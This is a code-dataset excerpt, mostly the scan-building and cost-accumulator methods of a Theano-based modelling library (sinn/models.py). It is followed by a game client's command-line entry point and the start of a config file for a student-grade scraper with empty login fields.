        try:\n            assert( shim.get_test_value(curtidx) >= -1 )\n            # Iteration starts at startidx + 1, and will break for indices < 0\n        except AttributeError:\n            # Unable to find test value; just skip check\n            pass\n\n
        # First, declare an “anchor” time index\n        # NB: num_tidx normally returns the earliest cur_tidx among unlocked state histories\n        #     If there are no state histories, or they are all locked, it returns self.t0idx\n        #     In both cases, this should constitute an appropriate anchor time index,\n        #     assuming that histories are synchronized (i.e. that all unlocked\n        #     state histories have the same cur_tidx). This is checked when\n        #     `num_tidx` is retrieved.\n
        anchor_tidx = self.num_tidx  # NB: `self.num_tidx` asserts that histories are synchronized\n        tidx_vars = [h._num_tidx for h in self.unlocked_histories]  # The index variables to replace by anchor_tidx\n
        if not self.time.Index(anchor_tidx+1).in_bounds:\n            raise RuntimeError(\n                \"In order to compute a scan function, the model must \"\n                \"have at least one uncomputed time point.\")\n
        # Build the substitution dictionary to convert all history time indices\n        # to that of the model. This requires that histories be synchronized.\n        anchor_tidx_typed = self.time.Index(anchor_tidx)  # Do only once to keep graph as clean as possible\n        tidxsubs = {h._num_tidx: anchor_tidx_typed.convert(h.time)\n                    for h in self.unlocked_histories}\n\n
        # Compute anchored expression graphs for `f`.\n        if f:\n            f_outputs = f(anchor_tidx_typed+1)\n            if not isinstance(f_outputs, Sequence_):\n                f_outputs = [f_outputs]\n        else:\n            f_outputs = []\n\n
        # Now we recover the global updates, and replace the multiple history\n        # time indices by the time index of the model.\n        output_hists = [h for h in self.history_set\n                        if h._latest_tap > 0 and not h.locked]\n
        if len(output_hists) + len(updates) + len(f_outputs) == 0:\n            raise RuntimeError(\"No history has been updated symbolically and \"\n                               \"the list of updates is empty. \"\n                               \"Cannot build a scan graph.\")\n
        if any(h._latest_tap > 1 for h in output_hists):\n            problem_hists = \", \".join(f\"{h.name} (Δk: {h._latest_tap})\"\n                                      for h in output_hists if h._latest_tap > 1)\n            raise NotImplementedError(\n                \"`map_over_time` requires that symbolic \"\n                \"updates only look forward one time step.\\nProblematic \"\n                f\"histories: {problem_hists}\")\n
            # The reason for that is that it's not clear how we should\n            # deal with forward taps >1: the scan still iterates 1 step at\n            # a time, so should we shift all time points back by k-1 ?\n            # More likely, a user would expect that we use Theano's support\n            # for forward taps – but then what do we do with other,\n            # uncomputed histories ? In short, it starts breaking our\n            # fundamental causality assumption.\n\n
        ## Construction of outputs_info (init vals & taps) ##\n\n
        # Initialize the `outputs_info` list for the scan step with the\n        # outputs of `f`. Since these don't require taps, we create dummy taps\n        # for them. (See https://github.com/aesara-devs/aesara/issues/500)\n        # C.f. following `if len(negtaps) == 0` below.\n\n
        outputs = f_outputs.copy()\n        outputs_info = []\n        output_taps_replace = []  # Flattened list of taps. Used to construct the\n                                  # substitution dict in onestep\n        tap_names = []  # Names to assign to tap variables. 
This must be done\n                        # inside `onestep`, when the tap variables are accessible\n
        for i, o in enumerate(f_outputs):\n            outputs_info.append(None)\n            # init_val = shim.ones(o.shape, dtype=o.dtype, symbolic=True)\n            # output_taps_replace.append(init_val)\n            # name = getattr(o, 'name', None)\n            # if name is None: name = f\"{getattr(f, '__name__', 'f')}.{i}\"\n            # init_val.name = f\"{name}[scan init, dummy]\"\n            # tap_names.append(f\"{name}[k-1]\")\n            # outputs_info.append({'initial': init_val, 'taps': [-1]})\n\n
        # Collect the information for the variables that are iterated forward\n        # We split taps into forward/positive (> 0) and backward/negative (≤ 0).\n        # Backward taps will become the `outputs_info` variable to scan.\n        # Forward taps define the update function; we only allow one forward tap.\n        # We only need the backward taps of histories which also have forward taps:\n        # since the others don't change during iteration, we can keep indexing\n        # directly into their `_num_data`.\n\n
        # Create the list of output variables for the scan step.\n        # Negative tap variables (which appear within the graph of positive\n        # tap variables) are substituted in by the `onestep` function below.\n        # `clone` replaces time index vars by expressions depending on the anchor.\n        # outputs = [shim.graph.clone(h[h._num_tidx+1], replace=tidxsubs)\n
        outputs += [h._taps[h.time.Index.Delta(1)] for h in output_hists]\n        for o, h in zip(outputs[len(f_outputs):], output_hists):\n            o.name = f\"{h.name}[k] (anchored)\"  # Corresponding var inside scan is named \"{h.name}[k]\"\n\n
        # Construct the outputs info from the negative taps.\n        # NB: Initial data must be contiguous, even if negative taps are not,\n        #     so taps [-3, -1] still require [k-3, k-2, k-1, k], where k is the\n        #     current time index.\n        #     If there are no negative taps, we just use the current value as\n        #     initialization (equivalent to having a tap of 0).\n
        # IMPORTANT: In Theano's tap indexing, taps are relative _to the time\n        #     point **being** computed_, while in Sinn, they are relative _to the\n        #     latest **computed** time point_. This means that we need to\n        #     subtract 1 from each tap to construct `outputs_info`.\n
        for h in output_hists:\n            negtaps = [tapk for tapk in sorted(h._taps) if tapk <= 0]\n            if len(negtaps) == 0:\n                # History is not needed to evaluate any graph.\n                # In theory there should be no need for an init val and the\n                # line below should be the most appropriate\n                # > outputs_info.append({'taps': None})\n                # However, scan doesn't behave quite correctly with tapless variables\n                # (see https://github.com/aesara-devs/aesara/issues/500), so\n                # we use the workaround of defining dummy variables.\n                # C.f. 
`for i, o in enumerate(f_outputs):` above\n                outputs_info.append(None)\n                # init_val = shim.ones(h.shape, dtype=h.dtype, symbolic=True)\n                # output_taps_replace.append(init_val)\n                # init_val.name = f\"{h.name}[scan init, dummy]\"\n                # tap_names.append(f\"{h.name}[k-1]\")\n                # outputs_info.append({'initial': init_val, 'taps': [-1]})\n
            else:\n                scantaps = [k-1 for k in negtaps]\n                init_length = -min(scantaps)\n                assert init_length > 0, \"create scan (map_over_time) -> output_info -> init length must be positive\"\n
                # NB: This will add any intermediate tap to the history's _taps;\n                #     I'm undecided on whether this is desired or not.\n                # NB: We take care here that the instances in output_taps_replace\n                #     are the same ones as in init_vals\n                # init_vals = [shim.graph.clone(h[h._num_tidx+Δk], replace=tidxsubs)\n
                init_vals = [h._taps[h.time.Index.Delta(Δk)]\n                             # NB: The use of _taps[…] is temporary, to help detect if a required tap is not already calculated (almost always, all previous taps should already have been calculated)\n                             for Δk in range(-init_length+1, 1)]\n
                if scantaps == [-1]:\n                    # To avoid requiring extra dimensions when no taps are used,\n                    # Theano special-cases the case with only the -1 tap and\n                    # removes the outer dimension.\n                    init_val = init_vals[0]\n                else:\n                    init_val = shim.stack(init_vals)\n
                init_val.name = f\"{h.name}[scan init]\"\n                init_tap_idx = [k+init_length for k in scantaps]\n                assert init_tap_idx[0] == 0, \"Bug in index arithmetic for scan outputs_info\"\n                output_taps_replace.extend([init_vals[Δk] for Δk in init_tap_idx])\n
                # Don't substitute the anchor tidx until after we've added to output_taps_replace,\n                # so that scan can still sub the tap vars\n                # init_vals = [shim.graph.clone(v, replace=tidxsubs) for v in init_vals]\n                # # Add names for debuggability\n                # for iv, Δk in zip(init_vals, scantaps):\n                #     iv.name = f\"{h.name}[k-{abs(Δk)}] (anchored)\"\n
                tap_names.extend(f\"{h.name}[k-{abs(Δk)}]\" for Δk in scantaps)\n
                # Add to outputs_info\n                outputs_info.append(\n                    {'initial': shim.graph.clone(shim.graph.clone(init_val,\n                                                 replace=tidxsubs),  # All indices -> anchor_tidx\n                                                 replace={anchor_tidx: curtidx}),  # anchor_tidx -> symbolic index used in function\n                     'taps': scantaps})\n\n
        # # Replace all time indices in updates by expressions depending on anchor\n        # updates = {k: shim.graph.clone(g, replace=tidxsubs)\n        #            for k,g in updates.items()}\n        # # Ensure that we actually do have a time dependence somewhere in the\n        # # graph we send to scan\n        # all_exprs = chain(outputs, output_taps_replace, updates.values())\n        # if not set(shim.graph.symbolic_inputs(all_exprs)) & set(tidx_vars):\n        #                                        # | set([anchor_tidx])) ):\n        #     raise RuntimeError(\"The updates dictionary has no dependency on \"\n        #                        \"any time index. 
Cannot build a scan graph.\")\n all_exprs = chain(outputs, output_taps_replace, updates.values())\n # The test below could be used if anchor_tidx were a brand new variable, and not just self.num_tidx (which can be added by `accumulate`)\n # assert not set(shim.graph.symbolic_inputs(all_exprs)) & set([anchor_tidx]), \\\n # \"The anchor_tidx must not be substituted into expressions before the scan step is constructed, and should not be used in expressions outside the `scan` (use the symbolic `curtidx` in the latter case).\"\n\n ## Definition of the scan step ##\n\n # Grab the list of shared vars to pass as non_sequences\n # NB: Providing the list of shared variables is not required, but\n # supposedly helps keep the graph cleaner and more efficient – which\n # might be especially beneficial with complex history update functions.\n # (https://theano-pymc.readthedocs.io/en/latest/library/scan.html?highlight=scan#using-shared-variables-gibbs-sampling)\n # I don't know how much of a difference this makes in practice, since\n # I generally don't see a difference in the output of debug print.\n shared_vars_in_graph = [\n v for v in shim.graph.shared_inputs(updates.values())\n if v is not anchor_tidx] # anchor_tidx is replaced inside onestep\n n_shared_vars = len(shared_vars_in_graph)\n\n # Now we build the step function that will be passed to `scan`.\n # NB: Keyword args are used to pass variables into onestep's local scope.\n # Although not strictly necessary, it's better form and avoids some\n # edge cases with scopes and function closures.\n def onestep(tidx, *args,\n outputs=outputs, output_taps_replace=output_taps_replace,\n updates=updates, output_hists=output_hists, tap_names=tap_names,\n tidxsubs=tidxsubs, n_shared_vars=n_shared_vars, n_foutputs=len(f_outputs)):\n assert len(args) == len(output_taps_replace) + n_shared_vars, \\\n \"Unexpected number of scan arguments. 
Unpacking relies on alignment of `args`, and thus will almost certainly fail\"\n
            if config.debug_level >= config.DebugLevels.GRAPH_PRINTS:\n                tidx = shim.print(tidx, \"tidx in scan\")\n
            # Construct the replace dict to substitute the scan vars passed in *args\n            output_taps = args[:len(output_taps_replace)]\n            taps_replace_dict = {orig: new for orig, new\n                                 in zip(output_taps_replace, output_taps)}\n
            # Replace anchored `anchor_tidx` by the unanchored `tidx` in the tidx substitution dictionary\n            tidxsubs = {k: shim.graph.clone(v, replace={anchor_tidx: tidx})\n                        for k, v in tidxsubs.items()}\n            tidxsubs[anchor_tidx] = tidx\n
            # Construct the output by substituting the scan args\n            # NB: It's important to do the taps substitution before the tidx\n            #     substitutions, because once the time indices are changed, the subgraphs\n            #     corresponding to taps no longer have the same identity.\n
            step_outputs = [shim.graph.clone(shim.graph.clone(o,\n                                             replace=taps_replace_dict),\n                                             replace=tidxsubs)  # Convert all hist anchors to expressions relative to the unanchored tidx\n                            for o in outputs]\n
            step_updates = OrderedDict(\n                (k, shim.graph.clone(shim.graph.clone(g,\n                                     replace=taps_replace_dict),\n                                     replace=tidxsubs))\n                for k, g in updates.items())\n
            # Add var names for easier debugging\n            f_outputs = step_outputs[:n_foutputs]\n            h_outputs = step_outputs[n_foutputs:]\n
            for o, o_anchored in zip(f_outputs, outputs):\n                name = getattr(o_anchored, 'name', None)\n                if name:\n                    o.name = name.replace(\"(anchored)\", \"\").strip() + \"[k]\"\n
            for o, h in zip(h_outputs, output_hists):  # h_outputs, not step_outputs: don't overwrite the names of the `f` outputs\n                o.name = f\"{h.name}[k]\"\n
            assert len(output_taps) == len(tap_names)\n            for o, tap_name in zip(output_taps, tap_names):\n                o.name = tap_name\n
            # Assert that all tap variables appear in the final computational graphs\n            symbinputs = shim.graph.symbolic_inputs(step_outputs + list(step_updates.values()))\n            # dummy_taps = [tap for orig_tap, tap in taps_replace_dict.items()\n            #               if orig_tap.name and \"[scan init, dummy]\" in orig_tap.name]\n
            missing_taps = [tap for tap in output_taps if tap not in symbinputs]\n            # missing_taps = [tap for tap in output_taps if tap not in symbinputs + dummy_taps]\n            # spurious_taps = [tap for tap in dummy_taps if tap in symbinputs]\n
            if missing_taps:\n                raise RuntimeError(\n                    \"Model.map_over_time.onestep: The \"\n                    \"following taps don't appear in the scan's iteration:\\n\"\n                    f\"{missing_taps}\\nMost likely a graph substitution failed; \"\n                    \"this could be a bug in sinn.Model.\")\n
            # if spurious_taps:\n            #     raise RuntimeError(\n            #         \"Model.map_over_time.onestep: The \"\n            #         \"following dummy taps were created within map_over_time() \"\n            #         \"but somehow appeared in the scan's iteration:\\n\"\n            #         f\"{spurious_taps}\\nThis is almost certainly a bug in sinn.Model.\")\n
            # Assert that for output histories (those with taps, and thus those\n            # which a) slide forward and b) have unfilled histories), only the\n            # taps appear in the computational graphs.\n
            unsubstituted_hists = [h for h in output_hists if h._num_data in symbinputs]\n            if unsubstituted_hists:\n                raise RuntimeError(\n                    \"Model.map_over_time.onestep: unlocked \"\n                    \"histories are integrated forward by scan; they \"\n                    \"should only appear in scan's computational graphs as taps. 
\"\n                    \"Yet the ones below also appear through their underlying \"\n                    \"shared variable `_num_data`; since `_num_data` is only \"\n                    \"filled _after_ the scan, this strongly suggests that \"\n                    \"something went wrong when constructing the scan graph.\\n\"\n                    f\"Histories: {unsubstituted_hists}\")  # Include the offending histories, as promised by \"the ones below\"\n
            # Return outputs and updates\n            if config.debug_level >= config.DebugLevels.GRAPH_PRINTS:\n                step_outputs = [shim.print(o, f\"scan output ({o.name})\") for o in step_outputs]\n            return step_outputs, step_updates\n\n
        # Check that there are no missing inputs: Theano's error messages\n        # for this are nasty. We want to catch the mistake first and print\n        # better information\n
        all_exprs = chain(outputs, output_taps_replace, updates.values())\n        symbinputs = shim.graph.pure_symbolic_inputs(all_exprs)\n        if symbinputs:\n            raise shim.graph.MissingInputError(\n                \"The following purely symbolic variables are present in the \"\n                \"computational graph. They were probably added accidentally; \"\n                \"the only supported symbolic variables are shared variables.\\n\"\n                f\"Pure symbolic inputs: {symbinputs}.\")\n\n
        ## Assembly into `scan` ##\n\n
        # Now we can construct the scan graph.\n        # NB: tidx will be replaced by anchor_tidx (i.e. num_tidx), so it should be k-1\n        #     if we want to compute k. Ergo, tidx range must go from curtidx to stoptidx-1.\n
        with catch_warnings():\n            # Theano still uses np.bool somewhere; there's nothing we or the user can do\n            filterwarnings(\"ignore\",\n                           \"`np.bool` is a deprecated alias for the builtin `bool`\",\n                           DeprecationWarning)\n
            outs, upds = shim.scan(onestep,\n                                   sequences = [shim.arange(curtidx, stoptidx,\n                                                            dtype=self.tidx_dtype)],\n                                   outputs_info = outputs_info,\n                                   non_sequences=shared_vars_in_graph,\n                                   name = f\"scan ({self.name})\",\n                                   return_list=True\n                                   )\n\n
        ## Final repackaging: history outputs moved to updates dict ##\n\n
        # We return updates to the history data with the update dictionary; this\n        # seems more intuitive (the number of outs matches the number of values\n        # returned by `f`) and also matches the old logic, so doesn't require\n        # changes outside this method.\n        # To do this, we create a new update dictionary for the shared data\n        # underlying updated histories, applying the values in `outs`, and\n        # combine it with `upds`.\n\n
        if outs is None: outs = []\n        assert len(outs) == len(f_outputs) + len(output_hists)\n
        # curtidx, stoptidx may be involved in arithmetic ops, but they should have one symbolic input each\n        inp_curtidx = shim.graph.pure_symbolic_inputs(curtidx)\n        if len(inp_curtidx) != 1:\n            warn(\"When creating the `scan`, we expect the symbolic curtidx (start index of the scan) \"\n                 f\"to depend on one purely symbolic input, but in fact it depends on {len(inp_curtidx)}.\")\n
        inp_stoptidx = shim.graph.pure_symbolic_inputs(stoptidx)\n        inp_stoptidx = [i for i in inp_stoptidx if not any(i is ic for ic in inp_curtidx)]\n        if len(inp_stoptidx) != 1:  # Check `inp_stoptidx` here (was `inp_curtidx`, a copy-paste slip)\n            warn(\"When creating the `scan`, we expect the symbolic stoptidx (stop index of the scan) \"\n                 f\"to depend on one purely symbolic input, but in fact it depends on {len(inp_stoptidx)}.\")\n
        if len(inp_curtidx) == 1 and len(inp_stoptidx) == 1:\n            # Test values for the assertions\n            # TODO?: Use actual test values ?\n            # inp = {inp_curtidx[0]: self.num_tidx, inp_stoptidx[0]: self.num_tidx+6}\n            inp = {inp_curtidx[0]: 0, inp_stoptidx[0]: 5}\n        else:\n            inp = None\n
        nsteps = stoptidx-curtidx\n        hist_updates = []  # Will store update dicts for each history\n        for h, out in zip(output_hists, outs[len(f_outputs):]):\n            outslc = slice(h._num_tidx + 1, h._num_tidx + 1 + nsteps)\n            # outslc = 
slice(shim.graph.clone(outslc.start, replace=tidxsubs),\n # shim.graph.clone(outslc.stop, replace=tidxsubs))\n # Sanity check: outslc resolves to a non-empty slice of same shape as out\n evalslc = None if not inp else shim.eval(outslc, givens=inp, if_too_costly='ignore')\n # # DEBUG >>>>>\n # print([h.name for h in self.unlocked_histories])\n # print(shim.eval(out, givens=inp, max_cost=None))\n # import theano\n # try:\n # gg = shim.grad(out.sum(), )[0][:8]\n # ff = shim.graph.compile(list(inp.keys()), gg, mode='guard:nan,inf,big')\n # print(ff(0, 5))\n # except theano.gradient.DisconnectedInputError:\n # pass\n # # <<<<< DEBUG\n if evalslc:\n assert evalslc.stop > evalslc.start, f\"Model.map_over_time: negative or zero length output slice for history {h.name}. \" \\\n f\"After the scan op, the generated data for this history would be of shape {out.shape.eval(inp)}, but the time slice (first time dimension) has end points\\nStart: {evalslc.start}\\nStop: {evalslc.stop}\"\n try:\n outlen = shim.eval(out.shape[0], givens=inp)\n except shim.graph.TooCostly:\n pass\n else:\n if outlen and evalslc.stop - evalslc.start != outlen:\n raise AssertionError(\n f\"After the scan op, the generated data for the history '{h.name}' would be of shape {out.shape.eval(inp)}, \"\n f\"but the time slice (first time dimension) has end points\\nStart: {evalslc.start}\\nStop: {evalslc.stop}\")\n # Add updates for this history\n hist_updates.append(h._get_symbolic_update(outslc, out))\n # Combine all updates into one dict\n # Variables targeted by update dictionaries should be pairwise disjoint\n repeated_upds = set().union(\n *(set(a) & set(b) for a,b in combinations((upds, *hist_updates), 2)))\n if repeated_upds:\n raise AssertionError(\"There are multiple updates targeting the \"\n f\"following variables:\\n{repeated_upds}\")\n upds = dict(chain(upds.items(), *(d.items() for d in hist_updates)))\n\n # Remove history updates from `outs`, since they are now in `upds`\n outs = outs[:len(f_outputs)]\n\n # Remove undesired history updates (typically intermediate histories)\n excl_hists = (h for h in self.history_set if h not in histories)\n excl_upds = set(chain(*((h._num_tidx, *(h._num_data if isinstance(h._num_data, tuple) else [h._num_data]))\n for h in excl_hists)))\n for k in list(upds.keys()):\n if k in excl_upds:\n del upds[k]\n\n # Any remaining anchor tidx should map to curtidx; replace by the symbolic `curtidx` in the tidx substitution dictionary\n tidxsubs = {anchor_tidx: curtidx,\n **{k: shim.graph.clone(v, replace={anchor_tidx: curtidx})\n for k, v in tidxsubs.items()}}\n outs = [shim.graph.clone(v, replace=tidxsubs) for v in outs]\n upds = {k: shim.graph.clone(v, replace=tidxsubs)\n for k,v in upds.items()}\n\n # Assert that none of the anchor time indices are left as inputs in the graph\n # Time indices should be functions of `curtidx` or `stoptidx` only.\n disallowed_tidx_inputs = (({h._num_tidx for h in self.history_set if h.locked} | {anchor_tidx})\n & set(shim.graph.symbolic_inputs(chain(outs, upds.values()))))\n if disallowed_tidx_inputs:\n raise RuntimeError(\n \"The following anchor time indices remain in update scan graph. 
\"\n                \"These should have been replaced by the unanchored time index \"\n                \"variables created within Model.map_over_time, \"\n                \"since they are not otherwise updated as the scan iterates \"\n                f\"over time points.\\n{disallowed_tidx_inputs}\")\n
        # out_upds = {h._num_data: shim.set_subtensor(h._num_data[curtidx:stoptidx], out)\n        #             for h, out in zip(output_hists, outs)}\n
        if outs:\n            if len(outs) == 1:\n                outs = outs[0]\n            return outs, upds\n        else:\n            return upds\n\n
    # ---------------------------------------------\n    # Helper decorators for building cost functions\n\n
    def accumulate_with_offset(self, start_offset, init_discard=0):\n        \"\"\"\n        .. Note:: In most cases, it is easier to use one of the helper functions,\n           either `accumulate` or `static_accumulate`.\n\n
        Construct a cost graph from a pointwise cost function.\n        A function is “pointwise” if it can be computed entirely from the histories\n        (i.e. it does not depend on its own value at other time points).\n\n
        For a cost function ``f``, the resulting graph corresponds to\n\n
        .. math::\n\n           \\sum_{i=t_0}^{t_n} f(i)\n\n
        where :math:`t_0` and :math:`t_n` are respectively ``curtidx+start_offset``\n        and ``curtidx+start_offset+batch_size``.\n\n
        The returned function takes two arguments, ``curtidx`` and ``batchsize``.\n\n
        **Side-effects**\n        State updates are added to the global update dictionary.\n\n
        Parameters\n        ----------\n        start_offset: Axis index delta | int\n            Index offset relative to the current time index.\n            There are mainly two intended values:\n            - 1: Evaluate one time index forward, relative to the current time.\n                 This will trigger all required history updates to integrate\n                 the model.\n                 Equivalent to `accumulate`.\n            - 0: Evaluate at the current time index. This should not trigger\n                 any history updates. This means dependencies on parameters are\n                 likely lost.\n                 Equivalent to `static_accumulate`.\n            Note that we don't have a clear use case for values ≥ 2, and do not\n            support them at this time.\n
        init_discard: Axis index delta | int\n            When computing the total cost, discard this many initial points.\n            This can be used to integrate the model symbolically for some number of\n            steps before starting the accumulator. If the resulting cost will be\n            differentiated, it's usually a good idea to include such steps to\n            ensure that BPTT produces sensible gradient estimates.\n\n
        Raises\n        ------\n        ValueError\n        : If the wrapped function has variadic arguments (*args or **kwargs).\n        : If the wrapped function does not have 1 or 2 arguments.\n        RuntimeError\n        : (when calling the returned accumulator) if the histories on which\n          the accumulator depends do not have at least one non-computed time point.\n\n
        Warns\n        -----\n        UserWarning\n        : If the wrapped function has 2 arguments and the first is not 'self'.\n\n
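        Example\n        -------\n        An illustrative sketch (the cost function, the data ``y``, the history\n        ``x`` and the symbolic index arguments are placeholders, not part of\n        the API; c.f. `accumulate` below for the usual shorthand)::\n\n            >>> @model.accumulate_with_offset(1, init_discard=2)\n            >>> def mse(model, tidx):\n            >>>     return (y[tidx] - model.x(tidx))**2\n            >>> cost_graph, updates = mse(curtidx, batchsize)\n\n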
Todo:: Add a mechanism for optionally advancing histories at the\n           same time a value is accumulated.\n        \"\"\"\n        def wrapped_acc(f):\n            # Inspect the signature of `f` to see if there is a `self` argument\n            # If so, attach the model to it.\n            # This is similar to the same pattern used in histories.HistoryUpdateFunction\n            sig = inspect.signature(f)\n            if any(p.kind in (inspect._ParameterKind.VAR_POSITIONAL,)\n                   #inspect._ParameterKind.VAR_KEYWORD)\n                   for p in sig.parameters.values()):\n                raise ValueError(\"Sinn accumulators don't support variadic \"\n                                 \"arguments at this time.\")\n            # “Required” means declared without a default value\n            extra_required_args = [p for p in list(sig.parameters.values())[2:]\n                                   if p.default is inspect._empty]\n            if extra_required_args:\n                raise ValueError(\n                    f\"The function {f.__qualname__} (signature: {sig}) \"\n                    \"should require at most two arguments (typically ``(model, tidx)``), \"\n                    f\"but it also requires {extra_required_args}.\")\n            if len(sig.parameters) == 1:\n                # Do not include `self`\n                firstarg = ()\n            elif len(sig.parameters) >= 2:\n                first_arg_name = next(iter(inspect.signature(f).parameters.keys()))\n                if first_arg_name not in (\"self\", \"model\"):\n                    warn(\"If an accumulator function accepts two arguments, \"\n                         \"the first should be 'self' or 'model'. \"\n                         f\"Received '{first_arg_name}'.\")\n                firstarg = (self,)\n            else:\n                raise ValueError(\n                    f\"The function {f.__qualname__} (signature: {sig}) \"\n                    \"should accept two arguments (typically ``(model, tidx)``), \"\n                    f\"but is defined with {len(sig.parameters)}.\")\n            # Create the accumulator function\n            def accumulated_function(curtidx, batchsize):\n                # NB: batch_size is actually batch_size+init_discard – i.e., the number of time points summed is batchsize-init_discard\n                # Ensuring this works correctly with shared variables would require more testing\n                assert shim.is_pure_symbolic(curtidx) and shim.is_pure_symbolic(batchsize)\n                # time index anchor\n                numtidx = self.num_tidx  # NB: Must be the same as used to create\n                                         # anchor_tidx in map_over_time\n                if not self.time.Index(numtidx+start_offset).in_bounds:\n                    raise RuntimeError(\n                        \"In order to compute a scan function, the model must \"\n                        f\"have at least {start_offset} uncomputed time point(s).\")\n                # Accumulator variable for the cost. 
Initialized to zero.\n                # cost = shim.shared(np.array(0, dtype='float64'), f\"accumulator ({f.__name__})\")\n                # Build the computational graph for the step update of the cost\n                # shim.add_update(cost, cost + f(*firstarg, self.time.Index(numtidx+start_offset)))\n                # f(…) triggers required history update computations\n                @wraps(f)\n                def fwrap(tidx):\n                    res = f(*firstarg, self.time.Index(numtidx+start_offset))\n                    res.name = f\"{f.__name__}\"  # TODO: As below, allow setting a different var name\n                    return res\n                # Convert the step update to an iteration\n                # TODO: Add mechanism for optionally also advancing history\n                cost, updates = self.map_over_time(\n                    fwrap, shim.get_updates(), curtidx, curtidx+batchsize) \n                if isinstance(cost, Sequence_):  # NB: `map_over_time` unpacks length one lists, so cost must have at least length 2\n                    raise RuntimeError(\"An accumulated function should return \"\n                                       f\"exactly one value; received {len(cost)}.\")\n                # Return the final cost, along with the rest of the updates\n                # Caller can decide if they want to apply updates or discard them\n                # cost_total = updates.pop(cost)\n                # shim.remove_update(cost)\n                shim.add_updates(updates)\n                Δ = getattr(init_discard, 'plain', init_discard)\n                res = cost[Δ:].sum()\n                res.name = f\"accumulated_{f.__name__}\"  # TODO: Allow setting different var name (e.g. \"loss\")\n                return res, shim.get_updates()\n            # Attach the offset, so functions can determine by how much they\n            # need to shift arguments\n            accumulated_function.start_offset = start_offset\n            # Attach the original function, so we can use it for serialization\n            accumulated_function.__func__ = f\n            # Define name and docstring of the new function based on the original\n            accumulated_function.__name__ = f\"accumulated_{f.__name__}\"\n            accumulated_function.__doc__ = (\"This function accumulates (sums) the values \"\n                                            f\"of the function `{f.__name__}` from \"\n                                            f\"`curtidx+{start_offset}` to `curtidx+{start_offset}+stoptidx`.\\n\\n\"\n                                            \"--------------------------------------------\\n\"\n                                            f\"Docstring for {f.__name__}:\\n\\n{f.__doc__}\")\n            return accumulated_function\n        return wrapped_acc\n\n    def accumulate(self, f=None, init_discard=0):\n        \"\"\"\n        Accumulate (sum) the function f. Histories are integrated along\n        with the accumulator.\n\n        If you need a differentiable cost function, this is almost always\n        the decorator to use.\n\n        Intended uses:\n        - Training a model with back propagation through time.\n\n        Example\n        -------\n        Mean-squared error between a target `y` and the variable `x` of a model\n        `model`.\n        Note the use of round brackets (`model.x(tidx)`) to ensure that the\n        update computations for `x` are triggered.\n        >>> model = Model(...)\n        >>> y = np.array(...)\n        >>> @model.accumulate\n        >>> def mse(tidx):\n        >>>     return (y[tidx] - model.x(tidx))**2\n        >>> @model.accumulate(init_discard=2)  # Discard the first two time points\n        >>> def mse2(tidx):\n        >>>     return (y[tidx] - model.x(tidx))**2\n        Both examples will integrate the same data points, but the result\n        returned by ``mse2`` will include two fewer terms than ``mse``.\n        \"\"\"\n        if f is None:\n            return partial(self.accumulate, init_discard=init_discard)\n        acc_f = self.accumulate_with_offset(1, init_discard)(f)\n        acc_f._accumulator = 'accumulate'\n        return acc_f\n\n    def static_accumulate(self, f=None, init_discard=0):\n        \"\"\"\n        Accumulate (sum) the function f without updating histories.\n        In `f`, use [] indexing to make sure you don't accidentally\n        trigger computations.\n\n        .. 
Warning:: Since update computations are not triggered,\n any dependencies of those computations on parameters\n will not show up in accumulator's graph.\n\n Intended for:\n - Evaluating a function on an already computed history.\n - Optimizing the evolution of a latent variable.\n\n *Not* intended for:\n - Training the model dynamics.\n \"\"\"\n if f is None:\n return partial(self.static_accumulate, init_discard=init_discard)\n acc_f = self.accumulate_with_offset(0, init_discard)(f)\n acc_f._accumulator = 'static_accumulate'\n return acc_f\n","sub_path":"sinn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":194199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244066110","text":"import argparse\nfrom .game import Game\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--address\", dest=\"address\", help=\"IP Address\", default=\"0.0.0.0\")\nparser.add_argument(\n \"--tcpport\", dest=\"tcp_port\", help=\"Listening tcp port\", default=\"1234\"\n)\nparser.add_argument(\n \"--udpport\", dest=\"udp_port\", help=\"Listening udp port\", default=\"1234\"\n)\nparser.add_argument(\n \"--udpaddr\", dest=\"udp_addr\", help=\"UDP Address to identify by\", default=\"1235\"\n)\n\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n game = Game(args.address, args.tcp_port, args.udp_port, args.udp_addr)\n game.run()\n","sub_path":"CollegiateHighGame/client/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"97937468","text":"#!/usr/bin/env python\n\n# Username\nLOGINID = ''\n# Pincode\nPIN = ''\n# Optional feide login: Requires feide.conf. Copy feide_sample\nFEIDE = False\n# Regex of the different course codes which you want to include\nCOURSEREGEX = 'MS\\d{3}A|INF\\d{4}NSA' # Change me to your courses. Normal regex\n# The schools which should be scraped.\nSCHOOLS = ['HiOA', 'UiO'] # Case sensitive\n\n# The url to studweb\nBASE_URL = \"https://www.studweb.no/as/WebObjects/studentweb2?inst=\"\n# Custom user agent\nUSER_AGENT = [('User-agent', 'Mozilla/5.0 (Windows NT 6.0; rv:27.0) Gecko/20100101 Firefox/27.0')]\n# To limit to the courses specified in the regex or not\nLIMITCOURSE = False\n# Menu collapsed (its a plus)\nMENUCOL = \"[+][IMG]\\xa0\"\n# Menu expanded\nMENUEXP = \"[ ][IMG]\\xa0\"\n# Hide failed classes\nHIDEFAILED = True\n# Print to stdout\nVERBOSE = True\n\n# Notifications\n# Send notification when points are updated\nNOTIFY = True\n# Service to notify your phone with. 
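The `accumulate`/`static_accumulate` decorators above both route through `accumulate_with_offset`, which turns a pointwise cost into a summed graph. The sinn machinery is symbolic, but the call pattern can be illustrated with a plain-Python analogue; the sketch below is illustrative only and is not the sinn implementation — it merely mirrors the `f is None -> partial` idiom and the `start_offset`/`init_discard` arithmetic:

from functools import partial, wraps

def accumulate(f=None, init_discard=0):
    # Plain-Python stand-in for Model.accumulate: sum a pointwise f over a
    # batch starting one step past curtidx, dropping the first `init_discard`
    # terms (Model.accumulate does this via accumulate_with_offset(1, ...)).
    if f is None:
        return partial(accumulate, init_discard=init_discard)
    @wraps(f)
    def accumulated(curtidx, batchsize):
        terms = [f(curtidx + 1 + i) for i in range(batchsize)]  # start_offset = 1
        return sum(terms[init_discard:])
    return accumulated

@accumulate(init_discard=2)
def sq(tidx):
    return tidx ** 2

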